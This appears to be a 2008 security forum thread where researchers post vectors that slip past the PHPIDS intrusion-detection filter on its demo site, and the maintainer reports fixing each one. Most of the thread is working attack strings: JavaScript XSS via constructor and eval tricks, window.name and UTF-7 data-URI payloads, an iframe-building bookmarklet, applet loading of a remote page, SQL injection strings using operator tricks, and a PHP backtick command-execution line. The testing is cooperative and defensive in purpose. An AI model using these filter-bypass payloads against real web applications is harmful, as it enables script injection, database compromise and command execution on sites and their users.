I don't really follow this thread, so I have no idea if this has been mentioned before, but sometimes you don't need to be able to execute code to execute code, if you know what I mean, e.g.

document.domain=name (set name to com or org or net, or whatever the TLD is)

seems to get past the filter on php-ids.org

Also, you can make it even simpler by overwriting an object inside the window object (i.e. something global), so you don't need the dot, e.g.

location=name (set name to javascript:whatever)

but that doesn't get past the filter, since you seem to flag on location=

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Hi kuza55!

Yep - I dunno why domain was left out in the rules - it is now included. We had a seripous wave of $=property injections several months ago but those issues should be fixed.

Greetings,
.mario

The = ' XSS without being noticed '.constructor.constructor
The ( decodeURI( 'aler%74%281%29' ) )
()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Fixed six hours ago :)

constructor attacks again: http://p42.us/phpids/62.html

1' *( @a)or 1 LIKE '1 http://demo.php-ids.org/?test=1'%20*(%20@a)or%201%20LIKE%20'1
1'%column LIKE'0 http://demo.php-ids.org/?test=1'%column%20LIKE'0
aa'%@var -1 or 1 SOUNDS LIKE(1)|'+1
1'&&column or'1 http://demo.php-ids.org/?test=1'%26%26column%20or'1
1'%column or 1 LIKE '1
1'< column or 1 LIKE'1
...
vuln operands: %, <, ^, /, &

Script attack + Thornmakers $ bypass:-
http://www.businessinfo.co.uk/labs/phpids/phpids1.html

Because I can't be bothered uploading a file each time I create a window.name payload, I've created a simple bookmarklet:-

javascript:namePayload=prompt('Enter payload');url=prompt('Enter url');html = '<iframe src="http://demo.phpids.org/?test='+url+'" name="'+namePayload+'"><\/iframe>';self.location="data:text/html,"+html;

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 2 time(s). Last edit at 03/03/2008 03:27AM by Gareth Heyes.

Wow - what a hailstorm ;) And all of them are pretty hard to fix. I will ping back if the problems are solved - thx!

Phew - tough ones but all fixed. The XSSes even got a whole new rule because I think the constructor thing has more potential...

new bug:

1' -1 or '1 http://demo.php-ids.org/?test=1'%20-1%20or%20'1
1' -1 - column or '1
1' -1 or+1= '+1

greetings :)



Edited 1 time(s). Last edit at 03/01/2008 03:14PM by Reiners.

Phew - nice and fixed ;)

http://p42.us/phpids/63.html
the injection is:

x=1+name
eval(x)

which only works when passed in as a url parameter. Looks like a bug.

fixes seem fine to me, good work :)

@thornmaker: A bug indeed - the input from the textarea is automatically using a carriage return AND a line break while the url example exclisively uses a line break. Fixed!

Maybe exploitable, works in IE I think

document.charset='UTF-7'

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Yep - it works. Could be handy if content length restrictions apply and other parameters get reflected later. 10x!

bypass: (x)setter=0?0.:alert,x=0

notes: I can't figure out how to turn the alert into an two stage eval. The best I can come up with is this which has an overall impact of 3. While I'm at it, this one almost works too and has an overall impact of 4. Maybe someone can improve on them...

thornmaker Wrote:
-------------------------------------------------------
> bypass: (x)setter=0?0.:alert,x=0

NICE. crazy O_O

Wow - nice ones. fixed in rev .888 - 0.4.8 is close ;) Thanks!

200,000, home, stop,back, blur, print,Script ('scroll,\valert(1),scroll')
()

Also works with:-
200,000, home, stop,back, blur, print,Script ('scroll,\veval(\vname),scroll')
()

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 05/20/2008 01:16AM by Gareth Heyes.

\v ftw!

Here's almost a pure XSS:-

Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized<applet/src/type=
text/html onload=200,000,home,stop,back,blur,print,Script(code)() code=ale alt=rt(1) Input not considered malicious by the PHPIDS will be displayed unfiltered - input considered malicious will be displayed sanitized

I really need to get back to work now so if anyone wants to try and improve the vector above then please do

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Scary no?

<applet/src=http://businessinfo.co.uk/labs/xss.html
type=text/html>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Scary indeed - and fixed. I didn't expect either the vertical tab issue nor that applets wouldn't be detected... 0.4.8 as soon as I am back home from Belgium ;)

Impact of 5:-

<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

I tried to bypass with loads of variations maybe this isn't exploitable with the current data: reg exp rule but I've posted it cause I thought it was cool.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Hi .mario!
as discussed, php command execution when eval'd:

if(`any command`) die(); (php-ids)

greetings,
Reiners

edit: hmm, well, if you can inject directly into a eval() there are a lot of other vectors, so I guess you dont intend to take care of these anyway ;)



Edited 1 time(s). Last edit at 05/25/2008 09:54AM by Reiners.

Hey guys - I just returned home. Will take care asap!

@Gareth: Hmmm - I am getting an Impact of 16... but nice vector anyway ;)

@mario

Impact 5:-
XSS without being noticed<a/href=da&#x74&#97:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

Bypass data but hit entity rule (impact 5):-
XSS without being noticed<a/href=da&#x74&#000000097:text/html&#59&#x63harset=UTF-7&#44+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAPAAvAHMAYwByAGkAcAB0AD4->test

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@gareth: Yuk - found it - it was a bug in the UTF7 detection. Fixed, thx!!